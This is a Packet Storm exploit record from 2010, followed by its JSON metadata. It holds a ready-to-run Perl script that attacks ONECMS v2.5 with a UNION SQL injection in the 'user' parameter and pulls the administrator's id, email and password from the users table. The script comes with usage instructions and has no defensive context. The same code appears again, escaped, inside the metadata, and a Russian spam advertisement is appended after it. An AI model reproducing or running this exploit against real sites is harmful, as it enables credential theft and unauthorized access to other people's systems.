ID PACKETSTORM:86929
Type packetstorm
Reporter Ctacok
Modified 2010-03-05T00:00:00
Description
`
# Exploit Title: ONECMS v2.5 SQL INJECTION
# Date: 05.03.2010
# Author: Ctacok and .:[melkiy]:.
# Software Link: http://sourceforge.net/projects/onecms/
# Version: 2.5
# Tested on: Ubuntu 9.10 Apache2+PHP5
#!/usr/bin/perl
use LWP::Simple;
print "\n";
print "##############################################################\n";
print "# ONECMS v2.5 SQL INJECTION #\n";
print "# Bug founded by: .:[melkiy]:. #\n";
print "# Exploit coded by: Ctacok #\n";
print "# Special for Antichat (forum.antichat.ru) #\n";
print "# Require : Magic_quotes = Off #\n";
print "##############################################################\n";
if (@ARGV < 2)
{
print "\n Usage: exploit.pl [host] [path] ";
print "\n EX : exploit.pl www.localhost.com /path/ prefix \n\n";
exit;
}
$host=$ARGV[0];
$path=$ARGV[1];
$prefix=$ARGV[2]; # PREFIX TABLES, Default: onecms
$vuln = "-2'+union+select+1,2,3,4,5,6,7,8,concat(0x3a3a3a,id,0x3a,username,0x3a,password,0x3a3a3a),10,11+from+".$prefix."_users";
$doc = get($host.$path."index.php?load=elite&user=".$vuln."+--+");
if ($doc =~ /:::(.+):(.+):(.+):::/){
print "\n[+] Admin id: : $1";
print "\n[+] Admin email: $2";
print "\n[+] Admin password: $3";
}
_________________________________________________________________
Устали от СПАМа на рабочем месте? Возьмите решение от NextMail:
http://www.nextcorp.ru/corp/virt.phtml
`
{"reporter": "Ctacok", "enchantments": {"score": {"vector": "NONE", "value": 7.5}, "dependencies": {"references": [], "modified": "2016-11-03T10:28:27"}, "vulnersScore": 7.5}, "published": "2010-03-05T00:00:00", "cvelist": [], "lastseen": "2016-11-03T10:28:27", "history": [], "id": "PACKETSTORM:86929", "sourceHref": "https://packetstormsecurity.com/files/download/86929/onecmsv25-sql.txt", "objectVersion": "1.2", "sourceData": "` \n \n# Exploit Title: ONECMS v2.5 SQL INJECTION \n# Date: 05.03.2010 \n# Author: Ctacok and .:[melkiy]:. \n# Software Link: http://sourceforge.net/projects/onecms/ \n# Version: 2.5 \n# Tested on: Ubuntu 9.10 Apache2+PHP5 \n \n#!/usr/bin/perl \nuse LWP::Simple; \nprint \"\\n\"; \nprint \"##############################################################\\n\"; \nprint \"# ONECMS v2.5 SQL INJECTION #\\n\"; \nprint \"# Bug founded by: .:[melkiy]:. #\\n\"; \nprint \"# Exploit coded by: Ctacok #\\n\"; \nprint \"# Special for Antichat (forum.antichat.ru) #\\n\"; \nprint \"# Require : Magic_quotes = Off #\\n\"; \nprint \"##############################################################\\n\"; \nif (@ARGV < 2) \n{ \nprint \"\\n Usage: exploit.pl [host] [path] \"; \nprint \"\\n EX : exploit.pl www.localhost.com /path/ prefix \\n\\n\"; \nexit; \n} \n$host=$ARGV[0]; \n$path=$ARGV[1]; \n$prefix=$ARGV[2]; # PREFIX TABLES, Default: onecms \n$vuln = \"-2'+union+select+1,2,3,4,5,6,7,8,concat(0x3a3a3a,id,0x3a,username,0x3a,password,0x3a3a3a),10,11+from+\".$prefix.\"_users\"; \n$doc = get($host.$path.\"index.php?load=elite&user=\".$vuln.\"+--+\"); \nif ($doc =~ /:::(.+):(.+):(.+):::/){ \nprint \"\\n[+] Admin id: : $1\"; \nprint \"\\n[+] Admin email: $2\"; \nprint \"\\n[+] Admin password: $3\"; \n} \n \n \n_________________________________________________________________ \n\u0423\u0441\u0442\u0430\u043b\u0438 \u043e\u0442 \u0421\u041f\u0410\u041c\u0430 \u043d\u0430 \u0440\u0430\u0431\u043e\u0447\u0435\u043c \u043c\u0435\u0441\u0442\u0435? \u0412\u043e\u0437\u044c\u043c\u0438\u0442\u0435 \u0440\u0435\u0448\u0435\u043d\u0438\u0435 \u043e\u0442 NextMail: \nhttp://www.nextcorp.ru/corp/virt.phtml \n \n \n \n`\n", "cvss": {"vector": "NONE", "score": 0.0}, "description": "", "references": [], "edition": 1, "title": "ONECMS 2.5 SQL Injection", "type": "packetstorm", "modified": "2010-03-05T00:00:00", "hash": "8f8fdc2c91fa3ab102c89fc18001cf5cc683fea56f36166f3ccb11f6c37fc4d0", "bulletinFamily": "exploit", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "d4be9c4fc84262b4f39f89565918568f", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "description"}, {"hash": "44b10877f59a84f424d8519827885db1", "key": "href"}, {"hash": "167fe00b1cbcca8c82fb65926b5a9343", "key": "modified"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "167fe00b1cbcca8c82fb65926b5a9343", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "99e014653710550af088ff33d5579092", "key": "reporter"}, {"hash": "0ae68a74e393c966ca558ef2a9f6d718", "key": "sourceData"}, {"hash": "9085c3784533d974c4959b1e32ab83d9", "key": "sourceHref"}, {"hash": "49612da65567d913bafec5a0880f7370", "key": "title"}, {"hash": "6466ca3735f647eeaed965d9e71bd35d", "key": "type"}], "href": "https://packetstormsecurity.com/files/86929/ONECMS-2.5-SQL-Injection.html", "viewCount": 0}
{}